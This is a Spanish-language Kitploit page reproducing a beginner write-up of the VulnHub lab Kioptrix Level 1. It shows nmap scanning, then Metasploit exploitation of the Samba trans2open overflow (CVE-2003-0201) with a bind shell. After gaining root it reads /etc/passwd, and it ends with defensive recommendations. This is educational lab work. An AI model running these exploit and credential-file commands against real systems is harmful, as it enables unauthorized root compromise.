Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
pentest-writeups — Writeup de Kioptrix Nivel 1 - CVE-2003-0201 Samba trans2open | Kitploit
Herramientas/GitHubGitHub/americooo/pentest-writeups
Escalada de PrivilegiosReconocimientoAnálisis de VulnerabilidadesExplotaciónPost-ExplotaciónCTFPruebas de PenetraciónAprendizaje y EducaciónLabs y Práctica
GitHubamericooo/pentest-writeups

pentest-writeups

Writeup de Kioptrix Nivel 1 - CVE-2003-0201 Samba trans2open

2hace 1 mesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir
Ver Repositorio

pentest-writeups

Writeup de Kioptrix Level 1 - CVE-2003-0201 Samba trans2open

Kioptrix Level 1 — Writeup de Pruebas de Penetración

Autor: Amirbek Raxmatullayev (@americo_444)
Fecha: 2026-06-17
Plataforma: VulnHub
Dificultad: Principiante
Objetivo: Obtener acceso root


1. Configuración del Entorno

ComponenteDetalles
Sistema Operativo AnfitriónUbuntu 26.04
HipervisorQEMU/KVM
ObjetivoKioptrix Level 1 (VMDK)
IP del Atacante192.168.56.1
IP del Objetivo192.168.56.101

Nota: VirtualBox era incompatible con el kernel 7.0.0-22-generic debido a un conflicto de espacio de nombres DKMS KVM. Se cambió a QEMU/KVM y se cargó el VMDK directamente sin conversión.

root@kitploit:~
qemu-system-x86_64 \
  -m 512 \
  -drive file="Kioptix Level 1.vmdk",format=vmdk \
  -netdev bridge,id=net0,br=virbr0 \
  -device e1000,netdev=net0 \
  -display gtk

2. Reconocimiento

2.1 Descubrimiento de Hosts

root@kitploit:~
nmap -sn 192.168.56.0/24

Resultado: Objetivo identificado en 192.168.56.101

2.2 Escaneo Completo de Puertos y Servicios

root@kitploit:~
nmap -sV -sC -p- 192.168.56.101

Puertos Abiertos:

2.3 Enumeración de Versión SMB

root@kitploit:~
msfconsole -q -x "use auxiliary/scanner/smb/smb_version; \
  set RHOSTS 192.168.56.101; run; exit"

Resultado: Samba 2.2.1a — versión críticamente vulnerable confirmada.


3. Análisis de Vulnerabilidades

CVE-2003-0201 — Desbordamiento de Búfer trans2open de Samba

Descripción:
Las versiones 2.2.x de Samba contienen una vulnerabilidad de desbordamiento de búfer basado en pila en la función trans2open. Esto permite que un atacante remoto no autenticado ejecute código arbitrario como root.

Versiones Afectadas: Samba 2.0.x — 2.2.8
Puntuación CVSS: 10.0 (Crítico)
Módulo de Explotación: exploit/linux/samba/trans2open


4. Explotación

4.1 Configuración de Metasploit

root@kitploit:~
msfconsole
use exploit/linux/samba/trans2open
set RHOSTS 192.168.56.101
set LHOST 192.168.56.1
set PAYLOAD linux/x86/shell_bind_tcp
run

¿Por qué bind_tcp en lugar de reverse_tcp?
El payload reverse_tcp falló porque la VM Kioptrix no podía alcanzar de vuelta al atacante a través de la configuración NAT/puente. Con bind_tcp, el atacante se conecta al objetivo — no se requiere conexión saliente desde la víctima.

4.2 Salida de la Explotación

root@kitploit:~
[*] Started bind TCP handler against 192.168.56.101:4444
[*] Trying return address 0xbffffdfc...
[*] Trying return address 0xbffffcfc...
...
[*] Command shell session 1 opened (192.168.56.1:36733 -> 192.168.56.101:4444)

¡Shell obtenido! ✅


5. Post-Explotación

root@kitploit:~
whoami
# root

id
# uid=0(root) gid=0(root) groups=99(nobody)

hostname
# kioptrix.level1

uname -a
# Linux kioptrix.level1 2.4.7-10 #1 Thu Sep 6 16:46:36 EDT 2001 i686 unknown

cat /etc/passwd
# root:x:0:0:root:/root:/bin/bash
# john:x:500:500::/home/john:/bin/bash
# harold:x:501:501::/home/harold:/bin/bash

Información del Sistema:

  • SO: Red Hat Linux, Kernel 2.4.7 (compilado en 2001)
  • Usuarios locales descubiertos: root, john, harold

6. Cadena de Ataque

root@kitploit:~
[Attacker: 192.168.56.1]
        |
        | Step 1: nmap full port scan
        v
[Target: 192.168.56.101]
        |
        | Step 2: Samba 2.2.1a identified
        v
[Metasploit — trans2open exploit]
        |
        | Step 3: Stack buffer overflow triggered
        v
[Bind shell opened on port 4444]
        |
        | Step 4: whoami = root
        v
[TARGET PWNED]

7. Conclusiones Clave

Lo que Aprendí:

  • Configurar un entorno de laboratorio con QEMU/KVM cuando VirtualBox falla
  • Identificación de servicios con nmap -sV -sC
  • Enumeración SMB usando módulos auxiliares de Metasploit
  • Comprensión de CVE-2003-0201 — mecánica del desbordamiento de búfer de pila
  • Diferencia entre los payloads bind_tcp y reverse_tcp y cuándo usar cada uno

Recomendaciones Defensivas (Blue Team):

  1. Actualizar Samba a la versión 3.x o posterior
  2. Restringir los puertos 139/445 mediante firewall — permitir solo hosts internos de confianza
  3. Aplicar todos los parches disponibles del SO y los servicios
  4. Implementar segmentación de red — SMB nunca debe exponerse externamente
  5. Implementar reglas IDS/IPS para detectar intentos de desbordamiento de búfer en SMB

8. Herramientas Utilizadas

HerramientaPropósito
nmapEscaneo de puertos, detección de servicios/versiones
Metasploit FrameworkEnumeración SMB, explotación
QEMU/KVMVirtualización de laboratorio
arp-scanDescubrimiento de hosts

9. Referencias

  • CVE-2003-0201 — NVD
  • Rapid7 — Módulo trans2open
  • VulnHub — Kioptrix Level 1

Escrito por Amirbek Raxmatullayev | BEK Coders Security Research | 2026

Descargar herramienta
PuertoServicioVersión
22/tcpSSHOpenSSH 2.9p2
80/tcpHTTPApache 1.3.20
111/tcpRPCrpcbind 2
139/tcpSMBSamba 2.2.1a
443/tcpHTTPSmod_ssl/2.8.4
32768/tcpStatusRPC #100024